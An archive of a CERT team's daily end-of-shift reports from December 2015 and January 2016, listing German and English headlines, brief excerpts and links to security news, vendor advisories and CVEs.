*** About CVE-2015-8518: SAP Adaptive Server Enterprise Extended Stored Procedure Unauthorized Invocation *** --------------------------------------------- SAP released an update for SAP ASE 16.0 and 15.7 that addresses a serious security flaw discovered by Martin Rakhmanov, lead security researcher at Trustwave, that has been around for a long time. Suppose there is a user joe in... --------------------------------------------- http://trustwave.com/Resources/SpiderLabs-Blog/About-CVE-2015-8518--SAP-Ada… *** How Nvidia breaks Chrome Incognito *** --------------------------------------------- When I launched Diablo III, I didn't expect the pornography I had been looking at hours previously to be splashed on the screen. But that's exactly what replaced the black loading screen. Like a scene from hollywood, the game temporarily froze as it launched, preventing any attempt to clear the screen. The game unfroze just before clearing the screen, and I was able to grab a screenshot (censored with bright red): --------------------------------------------- https://charliehorse55.wordpress.com/2016/01/09/how-nvidia-breaks-chrome-in…

1 0

Tageszusammenfassung - Freitag 8-01-2016
by Daily end-of-shift report 08 Jan '16

08 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 07-01-2016 18:00 − Freitag 08-01-2016 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Upcoming Security Updates for Adobe Acrobat and Reader (APSB16-02) *** --------------------------------------------- A prenotification Security Advisory (APSB16-02) has been posted regarding upcoming updates for Adobe Acrobat and Reader scheduled for Tuesday, January 12, 2016. We will continue to provide updates on the upcoming release via the Security Advisory as well as the... --------------------------------------------- https://blogs.adobe.com/psirt/?p=1308 *** Android-powered smart TVs targeted by malicious apps *** --------------------------------------------- Smart TVs running older versions of Android are being targeted by several websites offering apps containing malware, according to Trend Micro.The security vendor wrote on Thursday that it found a handful of app websites targeting people in the U.S. and Canada by offering the malicious apps.The apps are exploiting a flaw in Android that dates to 2014, showing that many smart TVs do not have the latest patches."Most smart TVs today use older versions of Android, which still contain this... --------------------------------------------- http://www.cio.com/article/3020357/android-powered-smart-tvs-targeted-by-ma… *** Good news, OAuth is almost secure *** --------------------------------------------- Boffins turn up a couple of protocol vulns in Facebooks login stanard German boffins believe there are protocol flaws in Facebooks ubiquitous OAuth protocol that render it vulnerable to attack. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/01/08/good_news_o… *** Anschlussmissbrauch durch schwerwiegende Lücke bei o2 *** --------------------------------------------- Seit über einem Jahr versucht o2 eine Schwachstelle im DSL-Netz zu schließen, durch die man fremde VoIP-Anschlüsse kapern kann. Bisher ist das nur zum Teil gelungen. --------------------------------------------- http://heise.de/-3066225 *** Checkpoint chaps hack whacks air-gaps flat *** --------------------------------------------- Bought a shiny IP KVM? Uh-oh 32c3 Checkpoint malware men Yaniv Balmas and Lior Oppenheim have developed an air gap-hopping malware system that can quietly infect, plunder, and maintain persistence on networked and physically separated computers. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/01/08/checkpoint_… *** Streaming-Dongle EZCast öffnet Hintertür ins Heimnetzwerk *** --------------------------------------------- Sicherheitsforscher haben Schwachstellen im HDMI-Dongle EZCast entdeckt. Über die können sich Angreifer Zugang zum Heimnetzwerk des Anwenders verschaffen - unabhängig davon, wie gut das Netz sonst geschützt ist. --------------------------------------------- http://heise.de/-3066210 *** Sicherheitspatches: VMware unterbindet Rechteausweitung *** --------------------------------------------- VMware dichtet seine Anwendungen ESXi, Fusion, Player und Workstation ab. Die abgesicherten Versionen stehen für Linux, OS X und Windows bereit. Von der Lücke scheint aber nur Windows bedroht zu sein. --------------------------------------------- http://www.heise.de/newsticker/meldung/Sicherheitspatches-VMware-unterbinde… *** Blocking Shodan isnt some sort of magical fix that will protect your data *** --------------------------------------------- Earlier this week, a threat alert from Check Point singled out Shodan as a risk to enterprise operations. The advisory warns Check Point customers about the service, highlighting some of the instances where sensitive data was exposed to the public because Shodan indexed it. When asked about the advisory [archive], Ron Davidson, Head of Threat Intelligence and Research at Check Point, said the company was seeing an increase in the variety and frequency of suspect scans, "including scanners... --------------------------------------------- http://www.csoonline.com/article/3020108/techology-business/blocking-shodan… *** Apple beseitigt gravierende QuickTime-Sicherheitslücken für Windows *** --------------------------------------------- Angreifer können mit Hilfe einer manipulierten Videodatei Schadcode einschleusen, erklärt Apple. Das Update beseitigt die Schwachstellen in Windows 7 und Vista. --------------------------------------------- http://heise.de/-3067145 *** Cracking Damn Insecure and Vulnerable App (DIVA) - Part 2: *** --------------------------------------------- In the previous article, we have seen the solutions for the first two challenges. In this article we will discuss the insecure data storage vulnerabilities in DIVA. --------------------------------------------- http://resources.infosecinstitute.com/cracking-damn-insecure-and-vulnerable… *** rt-sa-2015-005 *** --------------------------------------------- o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials --------------------------------------------- https://www.redteam-pentesting.de/advisories/rt-sa-2015-005.txt *** VMSA-2016-0001 *** --------------------------------------------- VMware ESXi, Fusion, Player, and Workstation updates address important guest privilege escalation vulnerability --------------------------------------------- http://www.vmware.com/security/advisories/VMSA-2016-0001.html *** PHP Bugs May Let Remote Users Obtain Potentially Sensitive Information, Gain Elevated Privileges, or Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1034608 *** APPLE-SA-2016-01-07-1 QuickTime 7.7.9 *** --------------------------------------------- APPLE-SA-2016-01-07-1 QuickTime 7.7.9[Re-sending with a valid signature]QuickTime 7.7.9 is now available and addresses the following:QuickTimeAvailable for: Windows 7 and Windows VistaImpact: Viewing a maliciously crafted movie file may lead to an [...] --------------------------------------------- http://prod.lists.apple.com/archives/security-announce/2016/Jan/msg00001.ht… *** DFN-CERT-2016-0001: Mozilla Firefox, Network Security Services, OpenSSL, GnuTLS: Eine Schwachstelle ermöglicht das Umgehen von Sicherheitsvorkehrungen *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0001/ *** USN-2865-1: GnuTLS vulnerability *** --------------------------------------------- Ubuntu Security Notice USN-2865-18th January, 2016gnutls26, gnutls28 vulnerabilityA security issue affects these releases of Ubuntu and its derivatives: Ubuntu 15.04 Ubuntu 14.04 LTS Ubuntu 12.04 LTSSummaryGnuTLS could be made to expose sensitive information over the network.Software description gnutls26 - GNU TLS library gnutls28 - GNU TLS library DetailsKarthikeyan Bhargavan and Gaetan Leurent discovered that GnuTLS incorrectlyallowed MD5 to be used for TLS 1.2 connections. If a remote... --------------------------------------------- http://www.ubuntu.com/usn/usn-2865-1/ *** Bugtraq: [security bulletin] HPSBUX03435 SSRT102977 rev.1 - HP-UX Web Server Suite running Apache, Remote Denial of Service (DoS) *** --------------------------------------------- http://www.securityfocus.com/archive/1/537254 *** Security Advisory: Privilege escalation vulnerability CVE-2015-7393 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/75/sol75136237.html?… *** Security Advisory: BIG-IP AOM password sync vulnerability CVE-2015-8611 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/05/sol05272632.html?… *** Security Advisory: F5 Path MTU Discovery vulnerability CVE-2015-7759 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/22/sol22843911.html?…

1 0

Tageszusammenfassung - Donnerstag 7-01-2016
by Daily end-of-shift report 07 Jan '16

07 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 05-01-2016 18:00 − Donnerstag 07-01-2016 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Ab Dienstag: Aus für Internet Explorer 8, 9 und 10 *** --------------------------------------------- Microsoft stellt ab dem 12. Jänner den Support für die veralteten Internet-Explorer-Versionen 8,9 und 10 ein. Diese erhalten künftig keine Updates mehr. --------------------------------------------- http://futurezone.at/produkte/ab-dienstag-aus-fuer-internet-explorer-8-9-un… https://www.microsoft.com/en-us/WindowsForBusiness/End-of-IE-support *** Site Updates: ISC/DShield API and ipinfo_ascii.html Page, (Wed, Jan 6th) *** --------------------------------------------- We are planning a couple of updates to the ways data can be retrieved automatically from this site. The main reason for this is to make it easier for us to maintain and support some of these features. The main idea will be that we focus automatic data retrieval to our API (isc.sans.edu/api or dshield.org/api). It should be the only place that is used to have scripts retrieve data. In the past, we had a couple of other pages that supported automatic data retrieval. For example, ipinfo_ascii.html... --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20577&rss *** How long is your password? HTTPS Bicycle attack reveals that and more *** --------------------------------------------- Get your 2FA on, slackers A new attack on supposedly secure communication streams raises questions over the resilience of passwords, security researchers warn. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/01/06/https_bicyc… *** Mozilla warns Firefox fans its SHA-1 ban could bork their security *** --------------------------------------------- Protection mechanism screws other protection mechanisms. What a tangled web we weave Mozilla has warned Firefox users they may be cut off from more of the web than expected - now that the browser rejects new HTTPS certificates that use the weak SHA-1 algorithm. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/01/07/mozilla_war… https://blog.mozilla.org/security/2016/01/06/man-in-the-middle-interfering-… *** MD5/SHA1: Sloth-Angriffe nutzen alte Hash-Algorithmen aus *** --------------------------------------------- Neue Angriffe gegen TLS: Krypto-Forscher präsentieren mit Sloth mehrere Schwächen in TLS-Implementierungen und im Protokoll selbst. Am kritischsten ist ein Angriff auf Client-Authentifizierungen mit RSA und MD5. --------------------------------------------- http://www.golem.de/news/md5-sha1-sloth-angriffe-nutzen-alte-hash-algorithm… *** Encrypted Blackphone Patches Serious Modem Flaw *** --------------------------------------------- msm1267 writes: Silent Circle, makers of the security and privacy focused Blackphone, have patched a vulnerability that could allow a malicious mobile application or remote attacker to access the devices modem and perform any number of actions. Researchers at SentinelOne discovered an open socket on the Blackphone that an attacker could abuse to intercept calls, set call forwarding, read SMS messages, mute the phone and more. Blackphone is marketed toward privacy-conscious users; it includes... --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/ocmLGjQf8XY/encrypted-black… *** OS-X-Security-and-Privacy-Guide *** --------------------------------------------- This is a collection of thoughts on securing a modern Apple Mac computer using OS X 10.11 "El Capitan", as well as steps to improving online privacy. This guide is targeted to "power users" who wish to adopt enterprise-standard security, but is also suitable for novice users with an interest in improving their privacy and security on a Mac. --------------------------------------------- https://github.com/drduh/OS-X-Security-and-Privacy-Guide *** Drupal - Insecure Update Process *** --------------------------------------------- Just a few days after installing Drupal v7.39, I noticed there was a security update available: Drupal v7.41. This new version fixes an open redirect in the Drupal core. In spite of my Drupal update process checking for updates, according to my local instance, everything was up to date: Issue #1: Whenever the Drupal update process fails, Drupal states that everything is up to date instead of giving a warning. --------------------------------------------- http://blog.ioactive.com/2016/01/drupal-insecure-update-process.html *** Jetzt Update installieren: WordPress behebt XSS-Lücke *** --------------------------------------------- Über eine Cross-Site-Scripting-Schwachstelle können Angreifer WordPress-Installationen kompromittieren. Betroffen sind alle Versionen bis einschließlich WordPress 4.4. --------------------------------------------- http://heise.de/-3065193 https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance… *** AVM-Router: Fritzbox-Lücke erlaubt Telefonate auf fremde Kosten *** --------------------------------------------- Durch eine kritische Lücke in den Fritzboxen können Angreifer etwa Telefonate auf fremde Rechnung führen und Code als Root ausführen. Die Lücke hat AVM bereits geschlossen, die Details wurden jedoch bis heute unter Verschluss gehalten. --------------------------------------------- http://heise.de/-3065588 *** A new, open source tool proves: Even after patching, deserializing will still kill you *** --------------------------------------------- Whats the problem here? ... When deserializing most objects, the code calls ObjectInputStream#resolveClass() as part of the process. This method is where all the patches and hardening against recent exploits take place. Because that method is never involved in deserializing Strings, anyone can use this to attack an application thats "fully patched" against the recent spate of attacks. --------------------------------------------- https://www.contrastsecurity.com/security-influencers/java-deserializing-op… *** rt-sa-2015-001 *** --------------------------------------------- AVM FRITZ!Box: Remote Code Execution via Buffer Overflow --------------------------------------------- https://www.redteam-pentesting.de/advisories/rt-sa-2015-001.txt *** rt-sa-2014-014 *** --------------------------------------------- AVM FRITZ!Box: Arbitrary Code Execution Through Manipulated Firmware Images --------------------------------------------- https://www.redteam-pentesting.de/advisories/rt-sa-2014-014.txt *** Bugtraq: [SYSS-2015-062] ownCloud Information Exposure Through Directory Listing (CVE-2016-1499) *** --------------------------------------------- [SYSS-2015-062] ownCloud Information Exposure Through Directory Listing (CVE-2016-1499) --------------------------------------------- http://www.securityfocus.com/archive/1/537244 *** DFN-CERT-2016-0023: Node.js-WS: Eine Schwachstelle ermöglicht das Ausspähen von Informationen *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0023/ *** DFN-CERT-2016-0028: Shotwell: Eine Schwachstelle ermöglicht das Umgehen von Sicherheitsvorkehrungen *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0028/ *** DFN-CERT-2016-0004: Mozilla Thunderbird, Debian Icedove: Mehrere Schwachstellen ermöglichen u.a. das Ausführen beliebigen Programmcodes *** --------------------------------------------- Version 3 (2016-01-05 17:52) | Debian stellt für die Distributionen Wheezy (old stable), Jessie (stable) und Stretch (testing) Sicherheitsupdates auf die Icedove Version 38.5.0 bereit. Die Schwachstellen CVE-2015-7210 und CVE-2015-7222 werden von diesen nicht adressiert. --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0004/ *** Security Advisory: QEMU vulnerability CVE-2012-3515 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/13/sol13405416.html?… *** Security Advisory: Out-of-bounds memory vulnerability with the BIG-IP APM system CVE-2015-8098 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/43/sol43552605.html?… *** DSA-3435 git - security update *** --------------------------------------------- Blake Burkhart discovered that the Git git-remote-ext helper incorrectlyhandled recursive clones of git repositories. A remote attacker couldpossibly use this issue to execute arbitary code by injecting commandsvia crafted URLs. --------------------------------------------- https://www.debian.org/security/2016/dsa-3435 *** Advantech EKI Vulnerabilities (Update B) *** --------------------------------------------- This updated advisory is a follow-up to the updated advisory titled ICSA-15-344-01A Advantech EKI Vulnerabilities that was published December 15, 2015, on the NCCIC/ICS-CERT web site. This advisory provides information regarding several vulnerabilities in Advantech's EKI devices. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-15-344-01 *** D-Link DCS-931L Arbitrary File Upload *** --------------------------------------------- Topic: D-Link DCS-931L Arbitrary File Upload Risk: High Text:## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-f... --------------------------------------------- https://cxsecurity.com/issue/WLB-2016010028

1 0

Tageszusammenfassung - Dienstag 5-01-2016
by Daily end-of-shift report 05 Jan '16

05 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Montag 04-01-2016 18:00 − Dienstag 05-01-2016 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** ProxieBack sneakily uses the victims server to bypass its own security *** --------------------------------------------- Palo Alto Networks has come across a new family of proxy-creating malware, called ProxyBack, that the company believes has been in the wild since 2014 and may have more than 20 versions now running. --------------------------------------------- http://www.scmagazine.com/proxieback-sneakily-uses-the-victims-server-to-by… *** Hocus-pocus! The stupidity of cybersecurity predictions *** --------------------------------------------- Every year, some publication asks me to come up with a list of my top 10 predictions for the security field, and every year I tell them they might as well just dust off an article I wrote a year earlier, with maybe a couple of buzzwords and a new technology added on. What you can generally expect in any given year is more of the same, with some slight variations.That doesn't stop people from making predictions, though. Vendors and supposed experts can't seem to control the urge, but... --------------------------------------------- http://www.cio.com/article/3019071/security/hocus-pocus-the-stupidity-of-cy… *** Matthew Garrett: Apple-Rechner eignen sich nicht für vertrauliche Arbeiten *** --------------------------------------------- Zwar kann mit UEFI Secure Boot und TPMs der Startprozess von Windows- und Linux-Rechnern einigermaßen abgesichert werden - dies ließe sich aber verbessern, sagt Security-Experte Matthew Garrett. Katastrophal sei die Lage dagegen bei Apple. --------------------------------------------- http://www.golem.de/news/matthew-garrett-apple-rechner-eignen-sich-nicht-fu… *** Comcast Home Security System Vulnerable to Attack *** --------------------------------------------- Comcast's Xfinity Home Security System is vulnerable to attacks that interfere with its ability to detect and alert to home intrusions. --------------------------------------------- http://threatpost.com/comcast-home-security-system-vulnerable-to-attack/115… *** Using IDAPython to Make Your Life Easier: Part 3 *** --------------------------------------------- In the first two posts of this series (Part 1 and Part 2), we discussed using IDAPython to make your life as a reverse engineer easier. Now let's look at conditional breakpoints. While debugging in... --------------------------------------------- http://researchcenter.paloaltonetworks.com/2016/01/using-idapython-to-make-… *** HTML5 Security Cheat Sheet *** --------------------------------------------- This OWASP cheat sheet serves as a guide for implementing HTML5 in a secure fashion. Contents include:Communication APIsStorage APIsGeolocationWeb WorkersSandboxed FramesOffline ApplicationsAnd... --------------------------------------------- http://www.net-security.org/secworld.php?id=19279 *** Nexus Security Bulletin - January 2016 *** --------------------------------------------- We have released a security update to Nexus devices through an over-the-air (OTA) update as part of our Android Security Bulletin Monthly Release process. [...] The most severe of these issues is a Critical security vulnerability that could enable remote code execution on an affected device through multiple methods such as email, web browsing, and MMS when processing media files. --------------------------------------------- https://source.android.com/security/bulletin/2016-01-01.html *** DSA-3432 icedove - security update *** --------------------------------------------- Multiple security issues have been found in Icedove, Debians version ofthe Mozilla Thunderbird mail client: Multiple memory safety errors,integer overflows, buffer overflows and other implementation errors maylead to the execution of arbitrary code or denial of service. --------------------------------------------- https://www.debian.org/security/2016/dsa-3432 *** Puppet Enterprise Configuration Error Lets Remote Non-Whitelisted Users Access the Target System *** --------------------------------------------- http://www.securitytracker.com/id/1034550 *** Cisco Security Advisories *** --------------------------------------------- *** Cisco Jabber STARTTLS Downgrade Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco IOS XR Software OSPF Link State Advertisement PCE Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco Prime Infrastructure Frame Injection Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco Unified Communications Manager SQL Injection Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** IBM Security Bulleins *** --------------------------------------------- *** IBM Security Bulletin: Vulnerability in OpenSSL affects Rational Tau (CVE-2015-3194) *** http://www.ibm.com/support/docview.wss?uid=swg21973108 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in Apache Commons affects IBM Kenexa LCMS Premier on Cloud (CVE-2015-7450) *** http://www.ibm.com/support/docview.wss?uid=swg21972649 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in OpenSource Dojo ToolKit affects IBM InfoSphere Master Data Management ( CVE-2015-5654) *** http://www.ibm.com/support/docview.wss?uid=swg21972787 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect WebSphere Partner Gateway Advanced/Enterprise editions(CVE-2015-4872) *** http://www.ibm.com/support/docview.wss?uid=swg21973241 --------------------------------------------- *** IBM Security Bulletin: The Elastic Storage Server and the GPFS Storage Server are affected by a vulnerability in IBM Spectrum Scale (CVE-2015-7456) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005574 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM TRIRIGA Application Platform (CVE-2015-7450) *** http://www.ibm.com/support/docview.wss?uid=swg21972369 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Access Manager for Web and IBM Tivoli Access Manager for e-business *** http://www.ibm.com/support/docview.wss?uid=swg21973135 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Cognos Command Center (CVE-2015-5006, CVE-2015-4872) *** http://www.ibm.com/support/docview.wss?uid=swg21972446 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in the IBM Java SDK affects IBM Rational Application Developer for WebSphere Software (CVE-2015-4872) *** http://www.ibm.com/support/docview.wss?uid=swg21973785 --------------------------------------------- *** IBM Security Bulletin: IBM Tealeaf Customer Experience allows unauthorized access to system files (CVE-2015-4988) *** http://www.ibm.com/support/docview.wss?uid=swg21968868 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in the IBM Java SDK affects IBM Rational Application Developer for WebSphere Software (CVE-2015-2613, CVE-2015-2601, CVE-2015-2625, CVE-2015-1931) *** http://www.ibm.com/support/docview.wss?uid=swg21972455 --------------------------------------------- *** IBM Security Bulletin:Vulnerability in OpenSSL affects IBM PureApplication System. (CVE-2015-1788) *** http://www.ibm.com/support/docview.wss?uid=swg21974116 --------------------------------------------- *** IBM Security Bulletin: IBM Tealeaf Customer Experience PCA Web UI PHP security issues *** http://www.ibm.com/support/docview.wss?uid=swg21972384 --------------------------------------------- Next End-of-Shift report on 2016-01-07

1 0

Tageszusammenfassung - Montag 4-01-2016
by Daily end-of-shift report 04 Jan '16

04 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 31-12-2015 18:00 − Montag 04-01-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Identische SSH-Schlüssel auf Hetzner-Servern *** --------------------------------------------- Aufgrund identischer SSH-Schlüssel können Angreifer verschlüsselte Verbindungen von Servern von Hetzner belauschen. --------------------------------------------- http://heise.de/-3057777 *** Difficult to block JavaScript-based ransomware can hit all operating systems *** --------------------------------------------- A new type of ransomware that still goes undetected by the great majority of AV solutions has been spotted and analyzed by Emsisoft researchers (via Google Translate). Ransom32 is delivered on the ... --------------------------------------------- http://www.net-security.org/malware_news.php?id=3184 http://blog.emsisoft.com/de/2016/01/01/meet-ransom32-the-first-javascript-r… *** Apple had more CVEs than any single MS product in 2015, but it doesnt really matter *** --------------------------------------------- Meaningless league table sparks silly schadenfreude A count of the number of CVEs issues on different platforms in 2015 has concluded that Apple was the most-advisoried operating system of the year, leading to gloating headlines that OS X is the "most vulnerable" of the lot. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/01/04/apple_had_m… *** Cisco Jabbers in the clear due to STARTTLS bug *** --------------------------------------------- Sysadmins get a belated Christmas present Twas the night before Christmas, when sysadmins probably werent watching their advisory feeds, that Cisco announced a vulnerability in its Jabber for Windows. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/01/04/cisco_jabbe… *** BlackEnergy cyberespionage group adds disk wiper and SSH backdoor to its arsenal *** --------------------------------------------- A cyberespionage group focused on companies and organizations in the energy sector has recently updated its arsenal with a destructive data-wiping component and a backdoored SSH server.The group is known in the security community as Sandworm or BlackEnergy, after its primary malware tool, and has been active for several years. It has primarily targeted companies that operate industrial control systems, especially in the energy sector, but has also gone after high-level government organizations,... --------------------------------------------- http://www.cio.com/article/3018790/blackenergy-cyberespionage-group-adds-di… *** The current state of boot security *** --------------------------------------------- I gave a presentation at 32C3 this week. One of the things I said was "If any of you are doing seriously confidential work on Apple laptops, stop. For the love of god, please stop." I didnt really have time to go into the details of that at the time, but right now Im sitting on a plane with a ridiculous sinus headache and the pseudoephedrine hasnt kicked in yet so here we go.The basic premise of my presentation was that its very difficult to determine whether your system is in a... --------------------------------------------- http://mjg59.dreamwidth.org/39339.html *** A Tip For The Analysis Of MIME Files, (Sat, Jan 2nd) *** --------------------------------------------- Ive written a diary entry about malicious MS Office documents stored as MIME files. A few days ago a reader contacted me for a problem he had analyzing such a maldoc MIME file. When he used emldump to analyze his sample (f67aa5a3ede3d31c5a68494c0678e2ee), it was not a multipart: $ ./emldump.py f67aa5a3ede3d31c5a68494c0678e2ee.vir 1: boundary=----=_NextPart_Jm9Ovypy.uUh6MCk charset=us-ascii $ You can make emldump skip this first line with option -H: $ ./emldump.py -H... --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20561&rss *** More Internet of Things irony: a security alarm with alarming security *** --------------------------------------------- Imagine that a crook could change the text ALARM STATUS RED in your intruder alarm alerts to say ALARM STATUS GREEN... --------------------------------------------- https://nakedsecurity.sophos.com/2016/01/03/more-internet-of-things-irony-a… *** DFN-CERT-2016-0001: Mozilla Firefox, Network Security Services: Eine Schwachstelle ermöglicht das Umgehen von Sicherheitsvorkehrungen *** --------------------------------------------- Bitte beachten Sie: Zur Behebung der hier genannten Schwachstelle hat Mozilla am 28. Dezember 2015 das Security Advisory MFSA2015-150 veröffentlicht, dieses aber kurze Zeit später, ohne Angaben von Gründen, wieder zurückgezogen. Zeitgleich wurde die Firefox Version 43.0.3 bereitgestellt. Ob die hier genannte Schwachstelle in der Version also tatsächlich behoben ist, ist unklar. In den Release Notes zur Firefox Version 43.0.3 wird die Schwachstelle nicht genannt. --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0001/ *** Mozilla Firefox MD5 Signature Support in TLS ServerKeyExchange Messages Exposes Users to Hash Collision Forgery Attacks *** --------------------------------------------- http://www.securitytracker.com/id/1034541 *** DFN-CERT-2016-0004: Mozilla Thunderbird: Mehrere Schwachstellen ermöglichen u.a. das Ausführen beliebigen Programmcodes *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0004/ *** Bugtraq: OSS-2016-03: Insufficient Integrity Protection in Winkhaus Bluesmart locking systems using Hitag S *** --------------------------------------------- http://www.securityfocus.com/archive/1/537223 *** Bugtraq: OSS-2016-02: Weak authentication in NXP Hitag S transponder allows an attacker to read, write and clone any tag *** --------------------------------------------- http://www.securityfocus.com/archive/1/537224 *** Bugtraq: Confluence Vulnerabilities *** --------------------------------------------- http://www.securityfocus.com/archive/1/537232 *** DSA-3433 samba - security update *** --------------------------------------------- Several vulnerabilities have been discovered in Samba, a SMB/CIFS file,print, and login server for Unix. The Common Vulnerabilities andExposures project identifies the following issues: --------------------------------------------- https://www.debian.org/security/2016/dsa-3433 *** PCRE Heap Overflow in pcre_compile2() in Processing Certain Regex Patterns May Let Remote Users Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1034555 *** #2015-012 Ganeti multiple issues *** --------------------------------------------- Ganeti, an open source virtualization manager, suffers from multiple issues in its RESTful control interface (RAPI). --------------------------------------------- http://www.ocert.org/advisories/ocert-2015-012.html

1 0

Tageszusammenfassung - Mittwoch 30-12-2015
by Daily end-of-shift report 30 Dec '15

30 Dec '15

======================= = End-of-Shift Report = ======================= Timeframe: Dienstag 29-12-2015 18:00 − Mittwoch 30-12-2015 18:00 Handler: Stephan Richter Co-Handler: n/a *** Microsoft may have your encryption key; here's how to take it back *** --------------------------------------------- It doesnt require you to buy a new copy of Windows. --------------------------------------------- http://arstechnica.com/information-technology/2015/12/microsoft-may-have-yo… *** Actor using Rig EK to deliver Qbot - update, (Wed, Dec 30th) *** --------------------------------------------- Introduction This diary is a follow-up to my previous diary on the actor using Rig exploit kit (EK) to deliver Qbot [1]. For this diary, Ive infected more Windows hosts from other compromised websites, so we have additional data on this actor. As previously noted, this actor has been delivering Qbot (also known as Qakbot) malware. The actor uses a gate to route traffic from the compromised website to the EK landing page. In this case, the gate returns a variable that is translated to a URL for... --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20551&rss *** The Truth is in Your Logs! *** --------------------------------------------- [The post The Truth is in Your Logs! has been first published on /dev/random]Keeping an eye on logs is boring... but mandatory! Hopefully, sometimes it can reveal funny stuffs! It looks like people at the CCC are having some fun too while their annual conference is ongoing... Here is what I got in my Apache logs this morning: 151.217.177.200 - - [30/Dec/2015:06:51:22 +0100] "DELETE your logs. \ Delete your installations. Wipe everything clean. Walk out into the... --------------------------------------------- https://blog.rootshell.be/2015/12/30/the-truth-is-in-your-logs/ *** Killed by Proxy: Analyzing Client-end TLS Interception Software *** --------------------------------------------- Topic: Killed by Proxy: Analyzing Client-end TLS Interception Software Risk: Medium Text:Abstract—To filter SSL/TLS-protected traffic, some antivirus and parental-control applications interpose a TLS proxy in the... --------------------------------------------- https://cxsecurity.com/issue/WLB-2015120310 *** 32C3: Automatisierte Sicherheitstests für das Internet der Dinge *** --------------------------------------------- Ein französisch-deutsches Forscherteam hat eine Emulationsumgebung entwickelt, mit der sich dynamische Penetrationstests von Firmware vernetzter Elektronikgeräte maschinell durchführen lassen. Erste Ergebnisse sprechen für sich. --------------------------------------------- http://heise.de/-3056880 *** Cloud Computing: Attacks Vectors and Counter Measures *** --------------------------------------------- I can bet that some of you might have missed the news about Star Wars, but there will be hardly any who do not know what Cloud computing is, as this has been the buzz for last several years. In this article, we will learn about various types of attacks that are possible in a... --------------------------------------------- http://resources.infosecinstitute.com/cloud-computing-attacks-vectors-and-c… *** Chrome: Google-Entwickler zerpflückt Antiviren-Addon *** --------------------------------------------- Eine Chrome-Erweiterung des Antiviren-Herstellers AVG habe so viele Sicherheitslücken gehabt, dass es auch Malware hätte sein können, schreibt ein Google-Entwickler. Die Fehler sind zwar behoben, das Addon könnte aber trotzdem aus dem Chrome-Store verbannt werden. --------------------------------------------- http://www.golem.de/news/chrome-google-entwickler-zerpflueckt-antiviren-add… *** Misconfigured databases, a growing threat *** --------------------------------------------- It has become commonplace to find misconfigured databases exposed to the public Internet. Last summer alone - 1,175 terabytes (approximately 1.1 petabytes) of data was left wide open for the amusement of inquiring minds and malicious hackers alike - ranging from SMBs to Fortune 500 companies. --------------------------------------------- http://darkmatters.norsecorp.com/2015/12/29/misconfigured-databases-a-growi… *** Mobile malware review for 2015 *** --------------------------------------------- December 30, 2015 The last year proved to be another challenging period for the smartphones and tablets owners. Cybercriminals continued to target users of Android devices - thus, the majority of "mobile" threats and unwanted software discovered in 2015 were intended for this platform. In particular, banking Trojans, Android ransomware, advertising modules, and SMS Trojans expanded their activity. Besides, this year witnessed a growing number of malware pre-installed into... --------------------------------------------- http://news.drweb.com/show/?i=9779&lng=en&c=9 *** Using IDAPython to Make Your Life Easier: Part 1 *** --------------------------------------------- As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2... --------------------------------------------- http://researchcenter.paloaltonetworks.com/2015/12/using-idapython-to-make-… *** 